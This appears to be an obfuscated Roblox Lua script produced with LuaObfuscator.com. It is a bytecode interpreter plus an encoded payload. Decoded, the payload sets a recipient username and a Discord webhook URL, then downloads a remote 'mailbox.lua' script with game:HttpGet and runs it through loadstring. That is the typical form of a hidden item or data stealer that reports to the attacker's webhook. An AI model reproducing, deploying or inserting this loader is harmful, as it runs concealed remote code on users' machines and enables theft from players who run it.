--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v99=v5(v82,v19);v19=nil;return v99;else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((929 -(214 + 713))^(v32-(2 -1))))%(((4 -3) + 1)^(((v33-(2 -1)) -(v32-(1 -0))) + (1638 -((1640 -(32 + 85)) + 114)))) ;return v83-(v83%(2 -1)) ;else local v84=(621 -(555 + 63 + 1))^(v32-(932 -(857 + 17 + 57))) ;return (((v31%(v84 + v84))>=v84) and (569 -(367 + 201))) or (1270 -(226 + 1044)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=957 -(892 + 65) ;local v36;local v37;while true do if (v35==(2 -1)) then return (v37 * (472 -216)) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 83 + 30)) ;v35=1;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;return (v41 * 16777216) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=3 -(1 + 1) ;local v45=(v20(v43,443 -(147 + 269 + 26) ,(1857 -(261 + 624)) -((1424 -622) + (1230 -(1020 + 60))) ) * ((5 -(1426 -(630 + 793)))^(57 -25))) + v42 ;local v46=v20(v43,21,23 + 8 );local v47=((v20(v43,32)==(998 -(915 + 82))) and  -(2 -1)) or (1 + 0) ;if (v46==(1486 -(998 + 488))) then if (v45==(0 -0)) then return v47 * (1187 -(1069 + 118)) ;else local v89=0 -0 ;while true do if (v89==(0 -0)) then v46=1139 -(116 + 1022) ;v44=0 -0 ;break;end end end elseif (v46==(356 + 1691)) then return ((v45==((0 -0) + 0)) and (v47 * ((1 -(0 -0))/(0 + 0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(368 + 423)) ) * (v44 + (v45/((6 -4)^(70 -(10 + 8))))) ;end local function v25(v48)local v49=0;local v50;local v51;while true do if ((3 -(2 + 0))==v49) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=1749 -(760 + 987) ;end if (v49==(1915 -(1789 + 124))) then v51={};for v90=1056 -(87 + 968) , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=769 -(745 + (92 -71)) ;end if (v49==(0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=(3 + 0) -2 ;end if (v49==(1 + 2)) then return v6(v51);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(4 -2)) then local v87=1587 -(412 + 1175) ;while true do if (v87==0) then v57=nil;v58=nil;v87=2 -1 ;end if (v87~=(1 + 0)) then else v52=1 + 2 ;break;end end end if (v52==(5 -2)) then v59=nil;while true do local v92=0;while true do if (v92==(1275 -(388 + 886))) then if (v53~=0) then else local v100=0 -0 ;while true do if ((1 + 1)==v100) then v53=1;break;end if ((561 -(306 + 254))~=v100) then else v56={};v57={v54,v55,nil,v56};v100=2;end if (v100==(0 + 0)) then v54={};v55={};v100=1;end end end break;end if (v92==(0 -0)) then if (v53~=1) then else v58=v23();v59={};for v104=1,v58 do local v105=603 -(268 + 335) ;local v106;local v107;local v108;local v109;while true do if (v105==0) then v106=0;v107=nil;v105=1;end if (v105==1) then local v110=0;while true do if (v110==0) then v108=nil;v109=nil;v110=291 -(60 + 230) ;end if (v110~=1) then else v105=2;break;end end end if ((574 -(426 + 146))==v105) then while true do if (v106==(0 + 0)) then v107=1456 -(282 + 1174) ;v108=nil;v106=1;end if (v106~=(812 -(569 + 242))) then else v109=nil;while true do if (v107==(2 -1)) then if (v108==(1 + 0)) then v109=v21()~=0 ;elseif (v108==2) then v109=v24();elseif (v108~=3) then else v109=v25();end v59[v104]=v109;break;end if (v107==0) then local v167=1024 -(706 + 318) ;local v168;while true do if (v167==0) then v168=0;while true do if (v168==1) then v107=1252 -(721 + 530) ;break;end if (v168~=(1271 -(945 + 326))) then else local v177=0 -0 ;while true do if (v177~=(0 + 0)) then else local v178=700 -(271 + 429) ;while true do if (v178==1) then v177=1;break;end if (v178==(0 + 0)) then v108=v21();v109=nil;v178=1501 -(1408 + 92) ;end end end if (v177~=1) then else v168=1;break;end end end end break;end end end end break;end end break;end end end v57[1089 -(461 + 625) ]=v21();v53=1290 -(993 + 295) ;end if (v53==2) then local v102=0 + 0 ;local v103;while true do if (v102~=(1171 -(418 + 753))) then else v103=0 + 0 ;while true do if (1==v103) then return v57;end if (0==v103) then local v129=0 + 0 ;while true do if (v129~=(1 + 0)) then else v103=1 + 0 ;break;end if (v129~=(529 -(406 + 123))) then else for v169=1,v23() do local v170=1769 -(1749 + 20) ;local v171;local v172;local v173;local v174;while true do if (v170==(1 + 1)) then while true do if (v171==(1322 -(1249 + 73))) then v172=0;v173=nil;v171=1 + 0 ;end if (v171~=1) then else v174=nil;while true do if (v172~=(1146 -(466 + 679))) then else while true do if (v173==0) then v174=v21();if (v20(v174,1,1)==(0 -0)) then local v179=0;local v180;local v181;local v182;local v183;local v184;while true do if (v179==(2 -1)) then v182=nil;v183=nil;v179=1902 -(106 + 1794) ;end if (v179==0) then v180=0 + 0 ;v181=nil;v179=1;end if (v179==2) then v184=nil;while true do if (v180~=(1 + 1)) then else while true do if (v181==(2 -1)) then local v186=0;while true do if (0==v186) then v184={v22(),v22(),nil,nil};if (v182==0) then local v195=0;local v196;while true do if (v195~=0) then else v196=114 -(4 + 110) ;while true do if (v196==(584 -(57 + 527))) then v184[1430 -(41 + 1386) ]=v22();v184[4]=v22();break;end end break;end end elseif (v182==(104 -(17 + 86))) then v184[3]=v23();elseif (v182==(2 + 0)) then v184[3]=v23() -(2^(35 -19)) ;elseif (v182~=(8 -5)) then else local v201=166 -(122 + 44) ;local v202;local v203;while true do if (0~=v201) then else v202=0;v203=nil;v201=1 -0 ;end if (v201==(3 -2)) then while true do if (0==v202) then v203=0 + 0 ;while true do if (v203~=(0 + 0)) then else v184[5 -2 ]=v23() -((67 -(30 + 35))^16) ;v184[3 + 1 ]=v22();break;end end break;end end break;end end end v186=1;end if (v186~=1) then else v181=1259 -(1043 + 214) ;break;end end end if (v181~=(11 -8)) then else if (v20(v183,1215 -(323 + 889) ,7 -4 )~=(581 -(361 + 219))) then else v184[4]=v59[v184[324 -(53 + 267) ]];end v54[v169]=v184;break;end if (0~=v181) then else local v188=0;while true do if (v188==1) then v181=1 + 0 ;break;end if (v188==(413 -(15 + 398))) then v182=v20(v174,2,985 -(18 + 964) );v183=v20(v174,4,22 -16 );v188=1;end end end if (v181==2) then if (v20(v183,1,1 + 0 )==(1 + 0)) then v184[2]=v59[v184[852 -(20 + 830) ]];end if (v20(v183,2 + 0 ,128 -(116 + 10) )==1) then v184[1 + 2 ]=v59[v184[741 -(542 + 196) ]];end v181=3;end end break;end if (0~=v180) then else local v185=0;while true do if (v185~=(1 -0)) then else v180=1 + 0 ;break;end if (v185==0) then v181=0 + 0 ;v182=nil;v185=1;end end end if (v180~=1) then else v183=nil;v184=nil;v180=2;end end break;end end end break;end end break;end if (v172==0) then v173=0 + 0 ;v174=nil;v172=2 -1 ;end end break;end end break;end if (v170==(2 -1)) then v173=nil;v174=nil;v170=1553 -(1126 + 425) ;end if (v170==0) then v171=405 -(118 + 287) ;v172=nil;v170=3 -2 ;end end end for v175=1122 -(118 + 1003) ,v23() do v55[v175-1 ]=v28();end v129=1;end end end end break;end end end v92=1;end end end break;end if (v52==(2 -1)) then v55=nil;v56=nil;v52=379 -(142 + 235) ;end if (v52~=(0 -0)) then else local v88=0;while true do if (1==v88) then v52=1 + 0 ;break;end if (v88~=0) then else v53=977 -(553 + 424) ;v54=nil;v88=1 -0 ;end end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v86=0;while true do if (v86==1) then if (v79<=11) then if (v79<=5) then if (v79<=2) then if (v79<=0) then local v111=0;local v112;local v113;local v114;local v115;while true do if (0==v111) then v112=v78[2];v113,v114=v69(v76[v112](v13(v76,v112 + 1 ,v78[3])));v111=1;end if (v111==1) then v71=(v114 + v112) -1 ;v115=0;v111=2;end if (2==v111) then for v159=v112,v71 do v115=v115 + 1 ;v76[v159]=v113[v115];end break;end end elseif (v79==1) then v70=v78[3];else v76[v78[2]]=v78[3]~=0 ;end elseif (v79<=3) then v76[v78[2]]();elseif (v79>4) then v62[v78[3]]=v76[v78[2]];else do return;end end elseif (v79<=8) then if (v79<=6) then local v116=v78[2];local v117=v76[v78[3]];v76[v116 + 1 ]=v117;v76[v116]=v117[v78[4]];elseif (v79>7) then v76[v78[2]]();else for v152=v78[2],v78[3] do v76[v152]=nil;end end elseif (v79<=9) then v76[v78[2]]=v78[3];elseif (v79==10) then v76[v78[2]]=v62[v78[3]];else local v136=v78[2];local v137=v76[v78[3]];v76[v136 + 1 ]=v137;v76[v136]=v137[v78[4]];end elseif (v79<=17) then if (v79<=14) then if (v79<=12) then v76[v78[2]]=v78[3];elseif (v79>13) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end else v76[v78[2]]=v62[v78[3]];end elseif (v79<=15) then local v125=v78[2];v76[v125]=v76[v125](v13(v76,v125 + 1 ,v71));elseif (v79==16) then local v143=0;local v144;while true do if (v143==0) then v144=v78[2];v76[v144]=v76[v144](v13(v76,v144 + 1 ,v71));break;end end elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=20) then if (v79<=18) then v62[v78[3]]=v76[v78[2]];elseif (v79==19) then v76[v78[2]]=v78[3]~=0 ;else v70=v78[3];end elseif (v79<=21) then do return;end elseif (v79>22) then local v147=v78[2];local v148,v149=v69(v76[v147](v13(v76,v147 + 1 ,v78[3])));v71=(v149 + v147) -1 ;local v150=0;for v154=v147,v71 do v150=v150 + 1 ;v76[v154]=v148[v150];end else for v157=v78[2],v78[3] do v76[v157]=nil;end end v70=v70 + 1 ;break;end if (v86==0) then v78=v66[v70];v79=v78[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D6503073O006234373336383103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O313233353139322O313938362O303234322F6545723641447567666949737A704268654F6430776179624E546564396D5F49387635675F5936796E7763547A41434B664930695578432D39656F38594D506542513964001B3O0012093O00014O0016000100013O0026113O0002000100010004143O00020001001209000100013O00261100010010000100020004143O0010000100120A000200033O00120A000300043O002006000300030005001209000500064O0013000600016O000300064O001000023O00022O00030002000100010004143O001A000100261100010005000100010004143O00050001001209000200083O002O12000200073O0012090002000A3O002O12000200093O001209000100023O0004143O000500010004143O001A00010004143O000200012O00043O00017O00",v9(),...);end
